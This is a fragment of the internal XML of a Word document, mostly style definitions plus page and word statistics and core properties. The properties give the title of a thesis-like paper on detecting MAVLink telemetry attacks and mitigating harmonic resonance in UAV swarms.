    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Times New Roman"/>
      <w:color w:val="0E2841"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Sans" w:cs="DejaVu Sans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="140"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal1">
    <w:name w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:after="160"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:eastAsia="Times New Roman" w:hAnsi="Aptos Display"/>
      <w:spacing w:val="-10"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="595959"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="10" w:color="0F4761"/>
        <w:bottom w:val="single" w:sz="4" w:space="10" w:color="0F4761"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0E2841"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4819"/>
        <w:tab w:val="right" w:pos="9638"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal1"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal1"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FrameContents">
    <w:name w:val="Frame Contents"/>
    <w:basedOn w:val="Normal"/>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footer" Target="footer1.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16</Pages>
  <Words>2257</Words>
  <Characters>12871</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>107</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15098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Nmap-Binary</dc:creator>
  <cp:lastModifiedBy>Nmap-Binary</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-15T19:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-15T19:25:00Z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2026-08-01T11:28:00Z</dcterms:created>
  <dc:creator>LOVEJOY MAKANGANI</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Nmap-Binary</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-06T22:10:00Z</dcterms:modified>
  <cp:revision>4</cp:revision>
  <dc:subject>uav drone technology</dc:subject>
  <dc:title>A FAULT TOLERANT CYBER PHYSICAL FLIGHT CONTROLLER DETECTING MAVLINK TELEMENTRY ATTACKS AND MITIGATING HARMONIC REASONANCE IN UAV SWARMS</dc:title>
</cp:coreProperties>
</file>